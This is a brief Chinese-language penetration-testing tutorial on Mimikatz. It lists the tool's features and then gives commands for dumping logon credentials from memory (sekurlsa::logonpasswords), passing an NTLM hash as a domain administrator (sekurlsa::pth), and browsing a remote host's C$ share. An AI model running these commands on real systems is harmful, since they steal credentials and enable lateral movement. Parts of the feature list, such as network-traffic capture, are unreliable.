内网渗透
域渗透
简介
Mimikatz是一款由法国安全研究员Benjamin Delpy(网名为gentilkiwi)开发的工具,主要用于从Windows操作系统提取加密的密码和其他凭证信息。该工具最初设计用于安全测试和审计,帮助专业人员理解系统的安全状况,并发现潜在的安全漏洞。
Mimikatz的主要功能包括:
- 提取内存中的明文密码和加密的凭证,包括NTLM和LSA散列。
- 执行密码破解,通过暴力破解或者字典攻击获取密码。
- 提升进程权限,模拟具有更高权限的用户行为。
- 注入代码到其他进程中,实现远程代码执行。
- 模拟Kerberos认证,生成假冒的服务票据。
- 捕获网络流量,分析认证过程中的数据交换。
使用猕猴桃查看预控C盘,查看C盘文件内容
cmd以管理员方式执行选择猕猴桃路径并打开
privilege::debug
sekurlsa::logonpasswords获取内存中保存的登录信息
sekurlsa::pth /user:administrator /domain:xxxx.com /ntlm:xxxxxxxxxxxxxxxxx
dir查看 主机192.168.1.254的C盘内容
dir \\xxx.xxx.xxx.xxx\c$命令字 + 主机